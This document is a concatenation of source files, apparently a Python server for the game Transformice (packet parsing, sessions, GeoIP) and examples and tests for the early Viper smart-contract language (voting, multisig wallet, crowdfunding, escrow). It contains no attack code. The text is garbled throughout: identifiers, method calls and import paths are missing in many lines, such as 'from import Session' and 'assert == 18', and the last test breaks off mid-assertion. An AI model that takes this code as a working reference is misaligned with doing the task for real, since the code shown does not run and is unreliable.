#### File: messages/incoming/ ```python from ruby.communication.messages.Incoming import Incoming class IMDummy(Incoming): tokens = [26, 26] def dispatch(self, session, buffer_array): pass ``` #### File: messages/incoming/ ```python from ruby.communication.messages.Incoming import Incoming class IMLogin(Incoming): tokens = [26, 8] def dispatch(self, session, buffer_array): pass ``` #### File: ruby/geoip/ ```python from geoip2 import database from ruby.utils import Logging from ruby.utils.Language import Language class GeoIP: def __init__(self):"Loading geoip.") self.__reader = database.Reader('files/GeoLite2-Country.mmdb') self.__languages = { Language.PT: { "PT" }, Language.BR: { "BR" }, Language.EN: { "US", "AG", "CA", "AU", "BS", "BB", "BZ" }, Language.ES: { "AR", "PY", "UY", "CO", "PE", "CL", "EC", "BO", "VE", "SV", "NI", "GT", "CR", "CU", "GQ", "HN", "PA", "DO", "MX", "ES" } } def get(self, address): try: response = iso_code = for language in self.__languages: if iso_code in self.__languages[language]: return language except: pass return Language.EN ``` #### File: network/buffer/ ```python import struct class BufferArray: def __init__(self, data=b""): if type(data) == bytes: self.bytes = data elif type(data) == str: self.bytes = data.encode() else: self.bytes = b"" def write(self, data): global bytes self.bytes += bytes(data, 'utf-8') def writeBool(self, data): self.bytes += struct.pack('!?', bool(data)) def writeByte(self, data): self.bytes += struct.pack('!B', int(data)) def writeBytes(self, data): self.bytes += data def writeShort(self, data): self.bytes += struct.pack('!H', int(data)) def writeInt(self, data): self.bytes += struct.pack('!I', int(data)) def writeLong(self, data): self.bytes += struct.pack('!Q', int(data)) def writeUTF(self, data): data = data.encode() length = len(data) self.bytes += struct.pack('!H', length) self.bytes += data def readBool(self): data = struct.unpack('!?', self.bytes[:1])[0] self.bytes = self.bytes[1:] return data def readByte(self): data = struct.unpack('!B', self.bytes[:1])[0] self.bytes = self.bytes[1:] return data def readBytes(self, length): data = self.bytes[:length] self.bytes = self.bytes[length:] return data def readShort(self): data = struct.unpack('!H', self.bytes[:2])[0] self.bytes = self.bytes[2:] return data def readInt(self): data = struct.unpack('!I', self.bytes[:4])[0] self.bytes = self.bytes[4:] return data def readLong(self): data = struct.unpack('!Q', self.bytes[:8])[0] self.bytes = self.bytes[8:] return data def readUTF(self): length = struct.unpack('!H', self.bytes[:2])[0] data = self.bytes[2:(length + 2)] self.bytes = self.bytes[(2 + length):] return data.decode() def toByteArray(self): return self.bytes def __len__(self): return len(self.bytes) def bytesAvailable(self): return len(self.bytes) > 0 ``` #### File: ruby/network/ ```python import asyncore import socket from import Session class Network(asyncore.dispatcher): def __init__(self, host, port, backlog): asyncore.dispatcher.__init__(self) self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.set_reuse_addr() self.bind((host, port)) self.listen(backlog) def handle_accepted(self, socket, address): Session(socket, address) ``` #### File: network/sessions/ ```python import asyncore import random from ruby import Controller from import BufferArray from import Encoder from ruby.utils import Logging from ruby.utils.Language import Language class Session(asyncore.dispatcher_with_send): def __init__(self, socket, address): super().__init__(socket) Controller.session_manager.append(self) self.__socket = socket self.__disposed = False self.__client = None self.__encoder = Encoder() self.ipAddress = address[0] self.language = Language(0) self.lastPacketID = 0 self.authKey = random.randrange(0xFFFF) def handle_read(self): if self.__disposed: return self.out_buffer = self.recv(1024) if not self.out_buffer: self.disconnect() return if self.out_buffer[0] == 60 and self.__client is None: self.send( "<cross-domain-policy><allow-access-from domain=\"*\" to-ports=\"*\" /></cross-domain-policy>") self.disconnect() return length = len(self.out_buffer) if length < 5: return buffer = BufferArray(self.out_buffer) sizeByte = buffer.readByte() if sizeByte < 1 or sizeByte > 3: return packetLen = buffer.readByte() if sizeByte == 1 else buffer.readShort() if sizeByte == 2 else (( buffer.readByte() & 0xFF) << 16) | ( ( buffer.readByte() & 0xFF) << 8) | ( buffer.readByte() & 0xFF) if sizeByte == 3 else 0 fullPacketLen = packetLen + sizeByte + 2 if packetLen == 0 or length < fullPacketLen: return packetId = buffer.readByte() if packetId != self.lastPacketID: self.disconnect() return self.lastPacketID = (packetId + 1) % 100 code1 = buffer.readByte() code2 = buffer.readByte() opcodes = code2 + (code1 << 8) if Controller.packet_manager.__contains__(opcodes): Controller.packet_manager.get(opcodes).dispatch(self, buffer) else: Logging.alert(f"Packet not found: [{code1}, {code2}] with opcode: {opcodes}") def writable(self): if not self.__disposed: return True def send(self, data): self.socket.send(self.__encoder.encoder(data)) def disconnect(self): if not self.__disposed: Controller.session_manager.remove(self) self.__disposed = True self.close() ``` #### File: TransformiceServer/ruby/ ```python import asyncore from import Network from ruby.utils import Logging class Server: def __init__(self, host, ports, backlog): self.__host = host self.__ports = ports self.__backlog = backlog self.__validPorts = [] def start(self):"Starting server.") for port in self.__ports: try: Network(self.__host, port, self.__backlog) self.__validPorts.append(port) except Exception as e: Logging.alert(f"Can't bind on port: {port}")"Server working on ports: {self.__validPorts}") asyncore.loop(timeout=30.0, use_poll=False, map=None, count=None) ``` #### File: ruby/tests/ ```python from import Encoder class Tests: @staticmethod def send(data): encoder = Encoder() message = encoder.encoder(data) print(message) pass ``` #### File: ruby/utils/ ```python import datetime def info(output): print(str("%X")) + f" [INFO] {output}") return def warn(output): print(str("%X")) + f" [WARN] {output}") return def alert(output): print(str("%X")) + f" [ALERT] {output}") return def session(address, output): print(str("%X")) + f" [SESSION] [{address}] {output}") return def packet(action, output): print(str("%X")) + f" [PACKET] [{action}] {output}") return ```
{ "source": "01admin/viper", "score": 4 }
#### File: examples/voting/ ```python voters: public({ # weight is accumulated by delegation weight: num, # if true, that person already voted voted: bool, # person delegated to delegate: address, # index of the voted proposal vote: num }[address]) # This is a type for a list of proposals. proposals: public({ # short name (up to 32 bytes) name: bytes32, # number of accumulated votes vote_count: num }[num]) voter_count: public(num) chairperson: public(address) # Setup global variables def __init__(_proposalNames: bytes32[5]): self.chairperson = msg.sender self.voter_count = 0 for i in range(5): self.proposals[i] = { name: _proposalNames[i], vote_count: 0 } # Give `voter` the right to vote on this ballot. # May only be called by `chairperson`. def give_right_to_vote(voter: address): # Throws if sender is not chairpers assert msg.sender == self.chairperson # Throws if voter has already voted assert not self.voters[voter].voted # Throws if voters voting weight isn't 0 assert self.voters[voter].weight == 0 self.voters[voter].weight = 1 self.voter_count += 1 # Delegate your vote to the voter `to`. def delegate(_to: address): to = _to # Throws if sender has already voted assert not self.voters[msg.sender].voted # Throws if sender tries to delegate their vote to themselves assert not msg.sender == to # loop can delegate votes up to the current voter count for i in range(self.voter_count, self.voter_count+1): if self.voters[to].delegate: # Because there are not while loops, use recursion to forward the delegation # self.delegate(self.voters[to].delegate) assert self.voters[to].delegate != msg.sender to = self.voters[to].delegate self.voters[msg.sender].voted = True self.voters[msg.sender].delegate = to if self.voters[to].voted: # If the delegate already voted, # directly add to the number of votes self.proposals[self.voters[to].vote].vote_count += self.voters[msg.sender].weight else: # If the delegate did not vote yet, # add to her weight. self.voters[to].weight += self.voters[msg.sender].weight # Give your vote (including votes delegated to you) # to proposal `proposals[proposal].name`. def vote(proposal: num): assert not self.voters[msg.sender].voted self.voters[msg.sender].voted = True self.voters[msg.sender].vote = proposal # If `proposal` is out of the range of the array, # this will throw automatically and revert all # changes. self.proposals[proposal].vote_count += self.voters[msg.sender].weight # Computes the winning proposal taking all # previous votes into account. @constant def winning_proposal() -> num: winning_vote_count = 0 for i in range(5): if self.proposals[i].vote_count > winning_vote_count: winning_vote_count = self.proposals[i].vote_count winning_proposal = i return winning_proposal # Calls winning_proposal() function to get the index # of the winner contained in the proposals array and then # returns the name of the winner @constant def winner_name() -> bytes32: return self.proposals[self.winning_proposal()].name ``` #### File: examples/wallet/ ```python from import tester as t from ethereum import utils c = t.Chain() c.head_state.gas_limit = 10**9 x = c.contract(open('').read(), args=[[t.a1, t.a2, t.a3, t.a4, t.a5], 3], language='viper') print([-192:]) c.tx(sender=t.k1, to=x.address, value=10**17) print([utils.encode_hex(a) for a in [t.a1, t.a2, t.a3, t.a4, t.a5]]) def sign(seq, to, value, data, key): h1 = utils.sha3(utils.encode_int32(seq) + b'\x00' * 12 + to + utils.encode_int32(value) + data) h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h1) return list(utils.ecsign(h2, key)) to, value, data = b'\x35' * 20, 10**16, b"" assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)]) try: x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, 0, 0, t.k5)]) success = True except: success = False assert not success try: x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k7, 0, t.k5)]) success = True except: success = False assert not success try: assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)]) success = True except: success = False assert not success assert x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)]) print("Basic tests passed") zero_address = "0x0000000000000000000000000000000000000000" accounts = ["0x776ba14735ff84789320718cf0aa43e91f7a8ce1", "0x095ce4e4240fa66ff90282c26847456e3f3b5002"] recipient = "0x776ba14735ff84789320718cf0aa43e91f7a8ce1" raw_sigs = [ "<KEY>", "0xc84fe5d2a600e033930e0cf73f26e78f4c65b134f9c9992f60f08ce0863abdbe0548a6e8aa2d952659f29c67106b59fdfcd64d67df03c1df620c70c85578ae701b" ] sigs = [(utils.big_endian_to_int(x[64:]), utils.big_endian_to_int(x[:32]), utils.big_endian_to_int(x[32:64])) for x in map(lambda z: utils.decode_hex(z[2:]), raw_sigs)] h = utils.sha3(utils.encode_int32(0) + b'\x00' * 12 + utils.decode_hex(recipient[2:]) + utils.encode_int32(25) + b'') h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h) assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[0][0], sigs[0][1], sigs[0][2]))[12:]) == accounts[0] assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[1][0], sigs[1][1], sigs[1][2]))[12:]) == accounts[1] x2 = c.contract(open('').read(), args=[accounts + [t.a3, zero_address, zero_address], 2], language='viper') c.tx(sender=t.k1, to=x2.address, value=10**17) assert x2.approve(0, recipient, 25, "", sigs + [[0, 0, 0]] * 3) print("Javascript signature tests passed") ``` #### File: examples/wallet/ ```python addrs: address[5] threshold: num seq: num def __init__(_addrs: address[5], _threshold: num): for i in range(5): if _addrs[i]: self.addrs[i] = _addrs[i] self.threshold = _threshold def approve(_seq: num, to: address, value: wei_value, data: bytes <= 4096, sigdata: num256[3][5]) -> bytes <= 4096: approvals = 0 h = sha3(concat(as_bytes32(_seq), as_bytes32(to), as_bytes32(value), data)) h2 = sha3(concat("\x19Ethereum Signed Message:\n32", h)) assert self.seq == _seq for i in range(5): if sigdata[i][0]: assert ecrecover(h2, sigdata[i][0], sigdata[i][1], sigdata[i][2]) == self.addrs[i] approvals += 1 assert approvals >= self.threshold self.seq += 1 return raw_call(to, data, outsize=4096, gas=3000000, value=value) ``` #### File: viper/tests/ ```python import pytest from .setup_transaction_tests import chain as s, tester as t, ethereum_utils as u, check_gas, \ get_contract_with_gas_estimation, get_contract def test_null_code(): null_code = """ def foo(): pass """ c = get_contract_with_gas_estimation(null_code) print('Successfully executed a null function') def test_basic_code(): basic_code = """ def foo(x: num) -> num: return x * 2 """ c = get_contract_with_gas_estimation(basic_code) assert == 18 print('Passed basic code test') def test_basic_repeater(): basic_repeater = """ def repeat(z: num) -> num: x = 0 for i in range(6): x = x + z return(x) """ c = get_contract_with_gas_estimation(basic_repeater) assert c.repeat(9) == 54 print('Passed basic repeater test') def test_more_complex_repeater(): more_complex_repeater = """ def repeat() -> num: out = 0 for i in range(6): out = out * 10 for j in range(4): out = out + j return(out) """ c = get_contract_with_gas_estimation(more_complex_repeater) assert c.repeat() == 666666 print('Passed complex repeater test') def test_offset_repeater(): offset_repeater = """ def sum() -> num: out = 0 for i in range(80, 121): out = out + i return(out) """ c = get_contract_with_gas_estimation(offset_repeater) assert c.sum() == 4100 print('Passed repeater with offset test') def test_offset_repeater_2(): offset_repeater_2 = """ def sum(frm: num, to: num) -> num: out = 0 for i in range(frm, frm + 101): if i == to: break out = out + i return(out) """ c = get_contract_with_gas_estimation(offset_repeater_2) assert c.sum(100, 99999) == 15150 assert c.sum(70, 131) == 6100 print('Passed more complex repeater with offset test') def test_array_accessor(): array_accessor = """ def test_array(x: num, y: num, z: num, w: num) -> num: a: num[4] a[0] = x a[1] = y a[2] = z a[3] = w return a[0] * 1000 + a[1] * 100 + a[2] * 10 + a[3] """ c = get_contract_with_gas_estimation(array_accessor) assert c.test_array(2, 7, 1, 8) == 2718 print('Passed basic array accessor test') def test_two_d_array_accessor(): two_d_array_accessor = """ def test_array(x: num, y: num, z: num, w: num) -> num: a: num[2][2] a[0][0] = x a[0][1] = y a[1][0] = z a[1][1] = w return a[0][0] * 1000 + a[0][1] * 100 + a[1][0] * 10 + a[1][1] """ c = get_contract_with_gas_estimation(two_d_array_accessor) assert c.test_array(2, 7, 1, 8) == 2718 print('Passed complex array accessor test') def test_digit_reverser(): digit_reverser = """ def reverse_digits(x: num) -> num: dig: num[6] z = x for i in range(6): dig[i] = z % 10 z = z / 10 o = 0 for i in range(6): o = o * 10 + dig[i] return o """ c = get_contract_with_gas_estimation(digit_reverser) assert c.reverse_digits(123456) == 654321 print('Passed digit reverser test') def test_state_accessor(): state_accessor = """ y: num[num] def oo(): self.y[3] = 5 def foo() -> num: return self.y[3] """ c = get_contract_with_gas_estimation(state_accessor) c.oo() assert == 5 print('Passed basic state accessor test') def test_arbitration_code(): arbitration_code = """ buyer: address seller: address arbitrator: address def setup(_seller: address, _arbitrator: address): if not self.buyer: self.buyer = msg.sender self.seller = _seller self.arbitrator = _arbitrator def finalize(): assert msg.sender == self.buyer or msg.sender == self.arbitrator send(self.seller, self.balance) def refund(): assert msg.sender == self.seller or msg.sender == self.arbitrator send(self.buyer, self.balance) """ c = get_contract_with_gas_estimation(arbitration_code, value=1) c.setup(t.a1, t.a2, sender=t.k0) try: c.finalize(sender=t.k1) success = True except: success = False assert not success c.finalize(sender=t.k0) print('Passed escrow test') def test_arbitration_code_with_init(): arbitration_code_with_init = """ buyer: address seller: address arbitrator: address @payable def __init__(_seller: address, _arbitrator: address): if not self.buyer: self.buyer = msg.sender self.seller = _seller self.arbitrator = _arbitrator def finalize(): assert msg.sender == self.buyer or msg.sender == self.arbitrator send(self.seller, self.balance) def refund(): assert msg.sender == self.seller or msg.sender == self.arbitrator send(self.buyer, self.balance) """ c = get_contract_with_gas_estimation(arbitration_code_with_init, args=[t.a1, t.a2], sender=t.k0, value=1) try: c.finalize(sender=t.k1) success = True except t.TransactionFailed: success = False assert not success c.finalize(sender=t.k0) print('Passed escrow test with initializer') def test_send(): send_test = """ def foo(): send(msg.sender, self.balance+1) def fop(): send(msg.sender, 10) """ c = s.contract(send_test, language='viper', value=10) with pytest.raises(t.TransactionFailed): c.fop() with pytest.raises(t.TransactionFailed): c.fop() def test_decimal_test(): decimal_test = """ def foo() -> num: return(floor(999.0)) def fop() -> num: return(floor(333.0 + 666.0)) def foq() -> num: return(floor(1332.1 - 333.1)) def bar() -> num: return(floor(27.0 * 37.0)) def baz() -> num: x = 27.0 return(floor(x * 37.0)) def baffle() -> num: return(floor(27.0 * 37)) def mok() -> num: return(floor(999999.0 / 7.0 / 11.0 / 13.0)) def mol() -> num: return(floor(499.5 / 0.5)) def mom() -> num: return(floor(1498.5 / 1.5)) def mon() -> num: return(floor(2997.0 / 3)) def moo() -> num: return(floor(2997 / 3.0)) def foom() -> num: return(floor(1999.0 % 1000.0)) def foon() -> num: return(floor(1999.0 % 1000)) def foop() -> num: return(floor(1999 % 1000.0)) """ c = get_contract(decimal_test) pre_txs = len(s.head_state.receipts) assert == 999 assert c.fop() == 999 assert c.foq() == 999 assert == 999 assert c.baz() == 999 assert c.baffle() == 999 assert c.mok() == 999 assert c.mol() == 999 assert == 999 assert c.mon() == 999 assert c.moo() == 999 assert c.foom() == 999 assert c.foon() == 999 assert c.foop() == 999 post_txs = len(s.head_state.receipts) print('Passed basic addition, subtraction and multiplication tests') check_gas(decimal_test, num_txs=(post_txs - pre_txs)) def test_harder_decimal_test(): harder_decimal_test = """ def phooey(inp: decimal) -> decimal: x = 10000.0 for i in range(4): x = x * inp return x def arg(inp: decimal) -> decimal: return inp def garg() -> decimal: x = 4.5 x *= 1.5 return x def harg() -> decimal: x = 4.5 x *= 2 return x def iarg() -> wei_value: x = as_wei_value(7, wei) x *= 2 return x """ c = get_contract(harder_decimal_test) assert c.phooey(1.2) == 20736.0 assert c.phooey(-1.2) == 20736.0 assert c.arg(-3.7) == -3.7 assert c.arg(3.7) == 3.7 assert c.garg() == 6.75 assert c.harg() == 9.0 assert c.iarg() == 14 print('Passed fractional multiplication test') def test_break_test(): break_test = """ def log(n: num) -> num: c = n * 1.0 output = 0 for i in range(400): c = c / 1.2589 if c < 1.0: output = i break return output """ c = get_contract_with_gas_estimation(break_test) assert c.log(1) == 0 assert c.log(2) == 3 assert c.log(10) == 10 assert c.log(200) == 23 print('Passed for-loop break test') def test_break_test_2(): break_test_2 = """ def log(n: num) -> num: c = n * 1.0 output = 0 for i in range(40): if c < 10: output = i * 10 break c = c / 10 for i in range(10): c = c / 1.2589 if c < 1.0: output = output + i break return output """ c = get_contract_with_gas_estimation(break_test_2) assert c.log(1) == 0 assert c.log(2) == 3 assert c.log(10) == 10 assert c.log(200) == 23 assert c.log(4000000) == 66 print('Passed for-loop break test 2') def test_augassign_test(): augassign_test = """ def augadd(x: num, y: num) -> num: z = x z += y return z def augmul(x: num, y: num) -> num: z = x z *= y return z def augsub(x: num, y: num) -> num: z = x z -= y return z def augdiv(x: num, y: num) -> num: z = x z /= y return z def augmod(x: num, y: num) -> num: z = x z %= y return z """ c = get_contract(augassign_test) assert c.augadd(5, 12) == 17 assert c.augmul(5, 12) == 60 assert c.augsub(5, 12) == -7 assert c.augdiv(5, 12) == 0 assert c.augmod(5, 12) == 5 print('Passed aug-assignment test') def test_break_test_3(): break_test_3 = """ def log(n: num) -> num: c = decimal(n) output = 0 for i in range(40): if c < 10: output = i * 10 break c /= 10 for i in range(10): c /= 1.2589 if c < 1: output = output + i break return output """ c = get_contract_with_gas_estimation(break_test_3) assert c.log(1) == 0 assert c.log(2) == 3 assert c.log(10) == 10 assert c.log(200) == 23 assert c.log(4000000) == 66 print('Passed aug-assignment break composite test') def test_init_argument_test(): init_argument_test = """ moose: num def __init__(_moose: num): self.moose = _moose def returnMoose() -> num: return self.moose """ c = get_contract_with_gas_estimation(init_argument_test, args=[5]) assert c.returnMoose() == 5 print('Passed init argument test') def test_constructor_advanced_code(): constructor_advanced_code = """ twox: num def __init__(x: num): self.twox = x * 2 def get_twox() -> num: return self.twox """ c = get_contract_with_gas_estimation(constructor_advanced_code, args=[5]) assert c.get_twox() == 10 def test_constructor_advanced_code2(): constructor_advanced_code2 = """ comb: num def __init__(x: num[2], y: bytes <= 3, z: num): self.comb = x[0] * 1000 + x[1] * 100 + len(y) * 10 + z def get_comb() -> num: return self.comb """ c = get_contract_with_gas_estimation(constructor_advanced_code2, args=[[5,7], "dog", 8]) assert c.get_comb() == 5738 print("Passed advanced init argument tests") def test_permanent_variables_test(): permanent_variables_test = """ var: {a: num, b: num} def __init__(a: num, b: num): self.var.a = a self.var.b = b def returnMoose() -> num: return self.var.a * 10 + self.var.b """ c = get_contract_with_gas_estimation(permanent_variables_test, args=[5, 7]) assert c.returnMoose() == 57 print('Passed init argument and variable member test') def test_crowdfund(): crowdfund = """ funders: {sender: address, value: wei_value}[num] nextFunderIndex: num beneficiary: address deadline: timestamp goal: wei_value refundIndex: num timelimit: timedelta def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta): self.beneficiary = _beneficiary self.deadline = block.timestamp + _timelimit self.timelimit = _timelimit self.goal = _goal @payable def participate(): assert block.timestamp < self.deadline nfi = self.nextFunderIndex self.funders[nfi].sender = msg.sender self.funders[nfi].value = msg.value self.nextFunderIndex = nfi + 1 @constant def expired() -> bool: return block.timestamp >= self.deadline @constant def timestamp() -> timestamp: return block.timestamp @constant def deadline() -> timestamp: return self.deadline @constant def timelimit() -> timedelta: return self.timelimit @constant def reached() -> bool: return self.balance >= self.goal def finalize(): assert block.timestamp >= self.deadline and self.balance >= self.goal selfdestruct(self.beneficiary) def refund(): ind = self.refundIndex for i in range(ind, ind + 30): if i >= self.nextFunderIndex: self.refundIndex = self.nextFunderIndex return send(self.funders[i].sender, self.funders[i].value) self.funders[i].sender = 0x0000000000000000000000000000000000000000 self.funders[i].value = 0 self.refundIndex = ind + 30 """ c = get_contract(crowdfund, args=[t.a1, 50, 600]) c.participate(value=5) assert c.timelimit() == 600 assert c.deadline() - c.timestamp() == 600 assert not c.expired() assert not c.reached() c.participate(value=49) assert c.reached() pre_bal = s.head_state.get_balance(t.a1) s.head_state.timestamp += 1000 assert c.expired() c.finalize() post_bal = s.head_state.get_balance(t.a1) assert post_bal - pre_bal == 54 c = get_contract(crowdfund, args=[t.a1, 50, 600]) c.participate(value=1, sender=t.k3) c.participate(value=2, sender=t.k4) c.participate(value=3, sender=t.k5) c.participate(value=4, sender=t.k6) s.head_state.timestamp += 1000 assert c.expired() assert not c.reached() pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]] c.refund() post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]] assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4] print('Passed composite crowdfund test') def test_comment_test(): comment_test = """ def foo() -> num: # Returns 3 return 3 """ c = get_contract_with_gas_estimation(comment_test) assert == 3 print('Passed comment test') def test_packing_test(): packing_test = """ x: num y: num[5] z: {foo: num[3], bar: {a: num, b: num}[2]} a: num def foo() -> num: self.x = 1 self.y[0] = 2 self.y[4] = 4[0] = 8[2] = 16[0].a = 32[0].b = 64[1].a = 128[1].b = 256 self.a = 512 return self.x + self.y[0] + self.y[4] +[0] +[2] + \[0].a +[0].b +[1].a +[1].b + self.a def fop() -> num: _x: num _y: num[5] _z: {foo: num[3], bar: {a: num, b: num}[2]} _a: num _x = 1 _y[0] = 2 _y[4] = 4[0] = 8[2] = 16[0].a = 32[0].b = 64[1].a = 128[1].b = 256 _a = 512 return _x + _y[0] + _y[4] +[0] +[2] + \[0].a +[0].b +[1].a +[1].b + _a """ c = get_contract_with_gas_estimation(packing_test) assert == 1023, assert c.fop() == 1023, c.fop() print('Passed packing test') def test_multi_setter_test(): multi_setter_test = """ foo: num[3] bar: num[3][3] def foo() -> num: = [1, 2, 3] return([0] +[1] * 10 +[2] * 100) def fop() -> num:[0] = [1, 2, 3][1] = [4, 5, 6] return[0][0] +[0][1] * 10 +[0][2] * 100 + \[1][0] * 1000 +[1][1] * 10000 +[1][2] * 100000 def goo() -> num: goo: num[3] goo = [1, 2, 3] return(goo[0] + goo[1] * 10 + goo[2] * 100) def gop() -> num: # Following a standard naming scheme; nothing to do with the US republican party gar: num[3][3] gar[0] = [1, 2, 3] gar[1] = [4, 5, 6] return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \ gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000 def hoo() -> num: = None return([0] +[1] * 10 +[2] * 100) def hop() -> num:[1] = None return[0][0] +[0][1] * 10 +[0][2] * 100 + \[1][0] * 1000 +[1][1] * 10000 +[1][2] * 100000 def joo() -> num: goo: num[3] goo = [1, 2, 3] goo = None return(goo[0] + goo[1] * 10 + goo[2] * 100) def jop() -> num: gar: num[3][3] gar[0] = [1, 2, 3] gar[1] = [4, 5, 6] gar[1] = None return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \ gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000 """ c = get_contract(multi_setter_test) assert == 321 assert c.fop() == 654321 assert == 321 assert == 654321 assert c.hoo() == 0 assert c.hop() == 321 assert c.joo() == 0 assert c.jop() == 321 print('Passed multi-setter literal test') def test_multi_setter_struct_test(): multi_setter_struct_test = """ foo: {foo: num, bar: num}[3] z: {foo: num[3], bar: {a: num, b: num}[2]}[2] def foo() -> num:[0] = {foo: 1, bar: 2}[1] = {foo: 3, bar: 4}[2] = {foo: 5, bar: 6} return[0].foo +[0].bar * 10 +[1].foo * 100 + \[1].bar * 1000 +[2].foo * 10000 +[2].bar * 100000 def fop() -> num: self.z = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]}, {foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}] return self.z[0].foo[0] + self.z[0].foo[1] * 10 + self.z[0].foo[2] * 100 + \ self.z[0].bar[0].a * 1000 + self.z[0].bar[0].b * 10000 + self.z[0].bar[1].a * 100000 + self.z[0].bar[1].b * 1000000 + \ self.z[1].foo[0] * 10000000 + self.z[1].foo[1] * 100000000 + self.z[1].foo[2] * 1000000000 + \ self.z[1].bar[0].a * 10000000000 + self.z[1].bar[0].b * 100000000000 + \ self.z[1].bar[1].a * 1000000000000 + self.z[1].bar[1].b * 10000000000000 def goo() -> num: goo: {foo: num, bar: num}[3] goo[0] = {foo: 1, bar: 2} goo[1] = {foo: 3, bar: 4} goo[2] = {foo: 5, bar: 6} return goo[0].foo + goo[0].bar * 10 + goo[1].foo * 100 + \ goo[1].bar * 1000 + goo[2].foo * 10000 + goo[2].bar * 100000 def gop() -> num: zed = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]}, {foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}] return zed[0].foo[0] + zed[0].foo[1] * 10 + zed[0].foo[2] * 100 + \ zed[0].bar[0].a * 1000 + zed[0].bar[0].b * 10000 + zed[0].bar[1].a * 100000 + zed[0].bar[1].b * 1000000 + \ zed[1].foo[0] * 10000000 + zed[1].foo[1] * 100000000 + zed[1].foo[2] * 1000000000 + \ zed[1].bar[0].a * 10000000000 + zed[1].bar[0].b * 100000000000 + \ zed[1].bar[1].a * 1000000000000 + zed[1].bar[1].b * 10000000000000 """ c = get_contract(multi_setter_struct_test) assert == 654321 assert c.fop() == 87198763254321 assert == 654321 assert == 87198763254321 print('Passed multi-setter struct test') def test_type_converter_setter_test(): type_converter_setter_test = """ mom: {a: {c: num}[3], b: num} non: {a: {c: decimal}[3], b:num} pop: decimal[2][2] def foo() -> num: = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4} self.non = return floor(self.non.a[0].c + self.non.a[1].c * 10 + self.non.a[2].c * 100 + self.non.b * 1000) def goo() -> num: self.pop = [[1, 2], [3, 4.0]] return floor(self.pop[0][0] + self.pop[0][1] * 10 + self.pop[1][0] * 100 + self.pop[1][1] * 1000) """ c = get_contract(type_converter_setter_test) assert == 4321 assert == 4321 print('Passed type-conversion struct test') def test_composite_setter_test(): composite_setter_test = """ mom: {a: {c: num}[3], b:num} qoq: {c: num} def foo() -> num: = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4} non = {c: 5}[0] = non non = {c: 6}[2] = non return[0].c +[1].c * 10 +[2].c * 100 + * 1000 def fop() -> num: popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4} self.qoq = {c: 5} popp.a[0] = self.qoq self.qoq = {c: 6} popp.a[2] = self.qoq return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000 def foq() -> num: popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4} popp.a[0] = None popp.a[2] = None return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000 """ c = get_contract(composite_setter_test) assert == 4625 assert c.fop() == 4625 assert c.foq() == 4020 print('Passed composite struct test') def test_crowdfund2(): crowdfund2 = """ funders: {sender: address, value: wei_value}[num] nextFunderIndex: num beneficiary: address deadline: timestamp goal: wei_value refundIndex: num timelimit: timedelta def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta): self.beneficiary = _beneficiary self.deadline = block.timestamp + _timelimit self.timelimit = _timelimit self.goal = _goal @payable def participate(): assert block.timestamp < self.deadline nfi = self.nextFunderIndex self.funders[nfi] = {sender: msg.sender, value: msg.value} self.nextFunderIndex = nfi + 1 @constant def expired() -> bool: return block.timestamp >= self.deadline @constant def timestamp() -> timestamp: return block.timestamp @constant def deadline() -> timestamp: return self.deadline @constant def timelimit() -> timedelta: return self.timelimit @constant def reached() -> bool: return self.balance >= self.goal def finalize(): assert block.timestamp >= self.deadline and self.balance >= self.goal selfdestruct(self.beneficiary) def refund(): ind = self.refundIndex for i in range(ind, ind + 30): if i >= self.nextFunderIndex: self.refundIndex = self.nextFunderIndex return send(self.funders[i].sender, self.funders[i].value) self.funders[i] = None self.refundIndex = ind + 30 """ c = get_contract(crowdfund2, args=[t.a1, 50, 600]) c.participate(value=5) assert c.timelimit() == 600 assert c.deadline() - c.timestamp() == 600 assert not c.expired() assert not c.reached() c.participate(value=49) assert c.reached() pre_bal = s.head_state.get_balance(t.a1) s.head_state.timestamp += 1000 assert c.expired() c.finalize() post_bal = s.head_state.get_balance(t.a1) assert post_bal - pre_bal == 54 c = get_contract(crowdfund2, args=[t.a1, 50, 600]) c.participate(value=1, sender=t.k3) c.participate(value=2, sender=t.k4) c.participate(value=3, sender=t.k5) c.participate(value=4, sender=t.k6) s.head_state.timestamp += 1000 assert c.expired() assert not c.reached() pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]] c.refund() post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]] assert [y-x for x, y in zip(pre_bals, post_bals)] == 